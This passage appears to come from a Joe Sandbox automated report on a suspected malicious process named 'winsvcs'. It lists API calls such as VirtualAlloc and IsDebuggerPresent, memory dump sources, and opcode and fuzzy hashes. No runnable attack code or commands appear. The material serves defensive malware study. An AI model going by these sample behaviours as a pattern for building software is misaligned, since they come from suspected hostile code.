                                                                                                                                                                                                                          • API ID: InvalidateRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 634782764-0
                                                                                                                                                                                                                          • Opcode ID: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
                                                                                                                                                                                                                          • Instruction ID: f450d144a2216a65e4146170c8b5550937e7e802fcbd3a1ddd5c57f0d0063f53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6D05E786843029FE714DF20EC84FA633A8EB1A704F46053DE884D72A0D7789501CB5E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 323 2200570-220059f call 22002f0 VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02200593
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2608158110.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2200000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction ID: 31afe5c2ec40e16a428bfd0609d4d6a05857422145c1c605fd8e59f60a5b2bed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABE07E7590020CAFCF01DFD8D9459ADBBB5EB08310F0080AAED14A6251D7719A20AF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 326 2203854-2203883 call 2203424 VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02203877
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction ID: 227d88f9d11fadec220c5ee2c0780b9aba4d5e82cdc44c438c03c39a7dad0d65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E07E7590020CAFCF01DF94D94589DBBB5EB08210F00809AED14A6351D6319A20EF51

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 329 2200540-220056c call 22002f0 VirtualFree
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02200560
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2608158110.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2200000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction ID: 3d1dd792a9182b67d1d1cdf1754d2caf6b0cb00006fd32beab8bad51989196ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69E09275D0020CEF8B00DFD8C8459ADBBB5EB08310F0080A9EC1497311D6319A60DF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 332 2203824-2203850 call 2203424 VirtualFree
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02203844
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction ID: 743ceb44ab787b50df68d46036b0b39ec8751a27463f1bf219fa1bd1a80e086b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8E00275D0020CEF8F05DF95D94599DBBB5EB18210F108199ED14A7351D6319A60DF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 335 2203764-220378d call 2203424 GlobalAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(?,?), ref: 02203781
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                                          • Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
                                                                                                                                                                                                                          • Instruction ID: 281106b1ace4744e20895f5fd5b5fd2d12c8de09b0a1e453adab172a4b2cc718
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDE02D79D0020CAF8B41EFA9D54589CFBB5EB08210F1081AAEC58A7351E631AA64DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0042EDA1
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EDB6
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00440498), ref: 0042EDC1
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0042EDDD
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 0042EDE4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                          • Opcode ID: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
                                                                                                                                                                                                                          • Instruction ID: 23f69739ab82ab60ae37d22de6363e677c78d496a800df86a2d8b411d35bdd9f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA21E0BC9042449FE711DF69FC496497BA0FB4A310F80107AE50997BA5E7B4A984CF8D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 00414162
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00414176
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00414184
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 004141B0
                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 004141B7
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00414206
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00414214
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00414220
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00414263
                                                                                                                                                                                                                          • GetClassNameA.USER32(00000000,?,00000008), ref: 00414271
                                                                                                                                                                                                                          • lstrcmp.KERNEL32(?,0043ACB4), ref: 00414281
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0041428D
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 00414297
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004143A9
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004143C4
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 004143D5
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004143E7
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0041444B
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0041445D
                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00414471
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004144B1
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004144BC
                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004144FD
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004145D1
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 004145E2
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 004146A8
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$Variant$Clear$AllocColorGlobalRedraw$CacheClassCurrentDestroyFlushInitInstructionNameParentProcessString_memcpy_slstrcmplstrlen
                                                                                                                                                                                                                          • String ID: 4D
                                                                                                                                                                                                                          • API String ID: 1509809736-4064760932
                                                                                                                                                                                                                          • Opcode ID: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
                                                                                                                                                                                                                          • Instruction ID: d33cbc65b261bd5f71919fcd58597f20de14d50e8eab0a0e342eb175f4602f49
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99028C71204205AFDB10CF24D848BABBBE5BF85714F14862AF859DB2A0D778DD81CB5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00420FE0
                                                                                                                                                                                                                          • GetClipBox.GDI32(00000000,?), ref: 00421001
                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 0042100B
                                                                                                                                                                                                                          • LPtoDP.GDI32(?,?,00000002), ref: 0042101C
                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00421038
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00421047
                                                                                                                                                                                                                          • DPtoLP.GDI32(?,?,00000002), ref: 00421058
                                                                                                                                                                                                                          • SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042106C
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000001,00000001), ref: 00421078
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042108A
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004210AA
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004210BA
                                                                                                                                                                                                                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004210D9
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004210E8
                                                                                                                                                                                                                            • Part of subcall function 004212B0: GetClipBox.GDI32(?,?), ref: 004212DA
                                                                                                                                                                                                                            • Part of subcall function 004212B0: SetBkColor.GDI32(?,00000001), ref: 0042132A
                                                                                                                                                                                                                            • Part of subcall function 004212B0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
                                                                                                                                                                                                                            • Part of subcall function 004212B0: SetBkColor.GDI32(?,00000000), ref: 00421367
                                                                                                                                                                                                                            • Part of subcall function 004212B0: DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
                                                                                                                                                                                                                            • Part of subcall function 004212B0: OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
                                                                                                                                                                                                                          • GetScrollPos.USER32(?,00000001), ref: 0042111F
                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,00000000), ref: 00421132
                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 004211D9
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004211F6
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000000), ref: 00421201
                                                                                                                                                                                                                          • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 0042123F
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042124D
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0042125C
                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0042127F
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0042128E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$ColorRectSelect$Offset$ClipCompatibleCreateDeleteModePaintText$BeginBitmapClientDrawEdgeScrollWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4279685224-0
                                                                                                                                                                                                                          • Opcode ID: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
                                                                                                                                                                                                                          • Instruction ID: 7b82af6886746e71b5745f1b2fbacf292f59da6906099b940e92044999803834
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5991C271508340EFDB218F65DD48BABBBF6FB88740F10892DFA9982260CB719854DF56
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 0041FF4B
                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 0041FF59
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0041FF6D
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0041FFB8
                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041FFD4
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 0041FFE2
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0041FFFA
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0042002D
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00420051
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00420065
                                                                                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 00420084
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000424), ref: 004200B0
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004200BB
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 004200D4
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004200EC
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00420110
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00420124
                                                                                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 00420143
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000610), ref: 0042016F
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0042017A
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00420193
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004201AB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ObjectSelect$DecrementInterlocked$Release$DrawEmptyRectText$CompatibleCreateDelete
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1917333124-0
                                                                                                                                                                                                                          • Opcode ID: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
                                                                                                                                                                                                                          • Instruction ID: 0d3b065532d34c83c141dc093bc01bf73ec72bfda3dbf1df21a0141086e03954
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CB19B71604304EFDB00CF64E888A6ABBF5FF88304F448A6AF9498B221D775DD55CB5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00410CAC
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00410CBA
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00410CD3
                                                                                                                                                                                                                            • Part of subcall function 00423370: RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
                                                                                                                                                                                                                            • Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
                                                                                                                                                                                                                            • Part of subcall function 00423370: LoadCursorA.USER32(00000000,00007F00), ref: 00423402
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClassExA.USER32(00000030), ref: 00423425
                                                                                                                                                                                                                            • Part of subcall function 00423370: __recalloc.LIBCMT ref: 00423479
                                                                                                                                                                                                                            • Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(0044B30C,00000081,00000005), ref: 00410CEC
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(0044B30C,00000081,000000F0), ref: 00410D07
                                                                                                                                                                                                                          • LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D13
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410D1A
                                                                                                                                                                                                                          • LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D28
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410D37
                                                                                                                                                                                                                          • DialogBoxIndirectParamA.USER32(0044B30C,00000000,?,00411A10,00000000), ref: 00410D5C
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410D71
                                                                                                                                                                                                                          • GlobalHandle.KERNEL32(00000000), ref: 00410D7E
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00410D85
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00410DA3
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410DAB
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410DBA
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00410DD4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$ErrorLast$ClassCriticalLoadRegisterSection$ClipboardEnterFindFormatGlobalInfoLock$CurrentCursorDialogExceptionFreeHandleIndirectLeaveParamRaiseThread__recalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 825656904-0
                                                                                                                                                                                                                          • Opcode ID: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
                                                                                                                                                                                                                          • Instruction ID: f745feaec7197e157a37296f2868a76793427c604a9b77b08ca0e5f371f76add
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A631D835241700BBD7201BB5BC8CAAB3B58EB49721B141A76FD11C2391DBF8DCC1866D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
                                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
                                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
                                                                                                                                                                                                                          • GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423402
                                                                                                                                                                                                                          • RegisterClassExA.USER32(00000030), ref: 00423425
                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 00423479
                                                                                                                                                                                                                          • GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 0042351E
                                                                                                                                                                                                                          • RegisterClassExA.USER32(00000030), ref: 00423541
                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 00423587
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 004235C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClassRegister$ClipboardCriticalCursorFormatInfoLoadSection__recalloc$EnterLeave
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 664480883-4108050209
                                                                                                                                                                                                                          • Opcode ID: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
                                                                                                                                                                                                                          • Instruction ID: 40b37d6fc815d34b22f1382bcbd39b080c0c3bcab1dcc9cb4347d5ed29d7557a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D61AFB0A043419BD711CF16E884A1ABBF5FF95715F90452EE89483360E7B8CA85CB8E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClipBox.GDI32(?,?), ref: 004212DA
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000001), ref: 0042132A
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0042133F
                                                                                                                                                                                                                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00421367
                                                                                                                                                                                                                          • DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
                                                                                                                                                                                                                          • OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
                                                                                                                                                                                                                          • DrawFrameControl.USER32(?,00000004,00000004,?), ref: 004213F0
                                                                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 00421461
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 004214CC
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000010), ref: 0042154A
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00421567
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004215F2
                                                                                                                                                                                                                          • DrawFocusRect.USER32(?,?), ref: 0042160D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$Text$Draw$Rect$ClipControlCopyEdgeFocusFrameOffset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2048994688-0
                                                                                                                                                                                                                          • Opcode ID: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
                                                                                                                                                                                                                          • Instruction ID: d2e7032c405a87bda436ebbee9352e43b21f8cfe9bd8d6afaaa75e2085407c70
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CC12775604205DFDB04CF18D884A6ABBF6FF88310F588A69F8898B3A5D770ED44CB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 0041380D
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00413821
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041382F
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0041385B
                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00413862
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 004138AC
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 004138B6
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004138C2
                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000507,?,00000001,00000000), ref: 00413937
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 0041394F
